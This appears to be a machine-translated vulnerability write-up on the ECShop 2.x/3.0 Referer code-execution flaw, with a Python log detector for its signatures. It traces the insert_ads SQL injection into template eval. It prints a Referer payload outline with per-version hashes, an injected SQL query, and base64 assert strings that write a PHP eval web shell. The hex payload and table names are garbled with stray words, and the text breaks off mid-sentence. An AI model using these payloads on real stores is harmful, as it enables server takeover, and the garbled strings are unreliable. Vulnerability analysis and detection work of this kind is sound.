
How to analyze the ECShop 2.x/3.0 code execution vulnerability

2025-01-19 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article walks through how to analyze the code execution vulnerability in ECShop 2.x and 3.0, which many people may not understand well. The analysis is summarized below.

0x00 Preface

ECShop is a B2C independent online store system, which is suitable for enterprises and individuals to quickly build personalized online stores. There are code execution vulnerabilities in version 2.x and version 3.0.

0x01 Vulnerability principle

ECShop does not validate the $GLOBALS['_SERVER']['HTTP_REFERER'] variable, so a user can insert arbitrary content into the user_passport.dwt template; insert_mod then dynamically calls the corresponding function according to the content of the template. The inserted malicious content makes the template dynamically call the insert_ads method in lib_insert, and SQL injection there returns the constructed code, which is later passed to the fetch function of the cls_template template class, where the malicious code is executed.

0x02 Environment setup

IDE: PHPStorm

PHP: 5.4

ECShop 3.0

ECShop 2.7.3

0x03 Analysis process

Overall function

First, go through the overall flow, starting in user.php.

Normally, the program assigns $GLOBALS['_SERVER']['HTTP_REFERER'] to $back_act, and then passes the value to the user_passport.dwt page template through assign and display of the cls_template template class. At this point, the content of the user_passport.dwt page template looks like this.

Enter $smarty->display. The functions that obtain shopping information and member information are then called dynamically through the splitting and deserialization performed in insert_mod. The two functions in user_passport.dwt are executed by default, that is, the insert_cart_info and insert_member_info functions in the lib_insert function library.

insert_cart_info function // call shopping information

insert_member_info function // call member information

user_passport.dwt template:

insert_mod function:

Payload: the 3.x _echash value 45ea207d7a2b68c49582d2d22adf953a, followed by ads| and a serialized two-element array (num and id) that carries the union select injection.

Start the analysis

When performing the login operation in user.php, change the value of $GLOBALS['_SERVER']['HTTP_REFERER'] to our code:

At this point, the value of $back_act is the Referer value we tampered with, and the program continues to execute:

$smarty->assign('back_act', $back_act); // assign the value

$smarty->display('user_passport.dwt'); // pass the value to the template

After assign and display have assigned and passed the value, the back_act value in the user_passport.dwt template looks like this:

Looking at the stack parameters, we can see that the value of $this->_echash is the same as the hash in our payload; it is a fixed hash value in ECShop. The _echash value of version 2.7 is 554fcae493e564ee0dc75bdf2ebf94ca and the _echash value of version 3.x is 45ea207d7a2b68c49582d2d22adf953a, so the payload used is also different.

When you enter the display function, the fetch function is executed to get the page template content.

$out = $this->fetch($filename, $cache_id); // get the template content, that is, the content of user_passport.dwt, according to $cache_id

The content is then split on the value of _echash, that is, the fixed hash value.

After the split, the program executes the two default functions first, then processes our code and continues into the insert_mod function.

$k[$key] = $this->insert_mod($val);

Following up, you can see that the string we entered is split on "|" and assigned to $fun and $para, respectively.

So the final values are similar to $fun = insert_ads and $para = array('num' => "*/ union ...", 'id' => "*/")
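The two fixed _echash values and the "name|serialized array" layout described above give defenders a stable signature to hunt for in the Referer field of web access logs. The following detector is an added example, not code from the original article or from ECShop; it assumes combined log format with embedded quotes escaped as \", and the function names and sample log lines are constructed for illustration.

```python
import re

# _echash values the article gives for each ECShop branch.
ECHASH = {"554fcae493e564ee0dc75bdf2ebf94ca": "2.7",
          "45ea207d7a2b68c49582d2d22adf953a": "3.x"}
# Combined log format; quotes inside a field are assumed to be escaped as \".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:[^"\\]|\\.)*" \d{3} \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?:[^"\\]|\\.)*"'
)
# After the hash, insert_mod expects "<name>|<serialized PHP array>".
DIRECTIVE_RE = re.compile(r"^(?P<fun>\w+)\|a:\d+:\{")

# Constructed sample lines; the serialized values are harmless placeholders.
SAMPLE_LOG = [
    r'203.0.113.7 - - [04/Sep/2018:09:18:30 +0000] "POST /user.php HTTP/1.1" '
    r'200 5120 "https://shop.example/index.php" "Mozilla/5.0"',
    r'198.51.100.23 - - [04/Sep/2018:09:18:33 +0000] "GET /user.php HTTP/1.1" 200 4312 '
    r'"45ea207d7a2b68c49582d2d22adf953aads|a:1:{s:3:\"num\";s:1:\"1\";}" "curl/7.58.0"',
    r'198.51.100.23 - - [04/Sep/2018:09:18:40 +0000] "GET /user.php HTTP/1.1" '
    r'200 4312 "http://x.example/?q=554fcae493e564ee0dc75bdf2ebf94ca" "-"',
]

def inspect_referer(referer):
    """Classify a Referer value; None means no _echash marker was found."""
    for echash, branch in ECHASH.items():
        if echash not in referer:
            continue
        # Split on the hash, as the template class does with its own output.
        for segment in referer.split(echash)[1:]:
            m = DIRECTIVE_RE.match(segment)
            if m:
                return {"branch": branch, "function": "insert_" + m["fun"],
                        "confidence": "high"}
        return {"branch": branch, "function": None, "confidence": "medium"}
    return None

def scan(lines):
    """Return one finding per log line whose Referer carries an _echash value."""
    findings = []
    for number, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        hit = inspect_referer(m["referer"]) if m else None
        if hit:
            findings.append({"line": number, "ip": m["ip"], **hit})
    return findings

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A legitimate Referer has no reason to contain either hash, so even the medium-confidence hits (hash present, no directive parsed) are worth reviewing.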

When execution reaches return $fun($para);, the insert_ads($para) function in the lib_insert dynamic function library is executed.

Following up, you can see that a SQL statement is executed here. The parameters $arr['id'] and $arr['num'] are the contents of the array we passed in, so they are controllable, which results in the injection.

At this point, the statement executed in the database is:

SELECT a.ad_id, a.position_id, a.media_type, a.ad_link, a.ad_code, a.ad_name, p.ad_width, p.ad_height, p.position_style, RAND () AS rnd FROM `ecshop3_ 0`.`ecs _ ad`AS a LEFT JOIN `ecshop3_ 0`.`ecs _ ad_ position`AS p ON a.position_id = p.position_id WHERE enabled = 1 AND start_time = '1536052713' AND a.position_id =' / * 'ORDER BY rnd LIMIT * / union select 1Magol 0x272f2a 5There are 0xB24617364275D3B617373642862636536345F6465636F6465285A6C735A567765266592397567567564484DF4A49756347687774A79776E50447761484A79776A6862436B583145531526D5445784D5630704F794F79702729293B2F2F7D78778

You can see that the position_id and position_style fields of the database are overwritten by the union select query as'/ * and {$asd']; assert (base64_decode ('ZmlsZV9wdXRfY29udGVudHMoJzIucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTExMV0pOyA/Picp')); / /} xxx

After the query finishes, the fetch function of the cls_template template class is executed based on the value of $position_style.

$val = $GLOBALS['smarty']->fetch($position_style); // executes the fetch function of smarty

Following up, this is where the malicious code is finally executed.

$out = $this->_eval($this->fetch_str(substr($filename, 4))); // the statement is finally executed

Taking a look at the internal string processing, the value passed in filename is:

"str: {$asd']; assert (base64_decode ('ZmlsZV9wdXRfY29udGVudHMoJzEucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTMzN10pOyA/Picp')); / /} xxx"

Then substr cuts the filename, and the result goes to $this->fetch_str. You can see that the return of the fetch_str function is
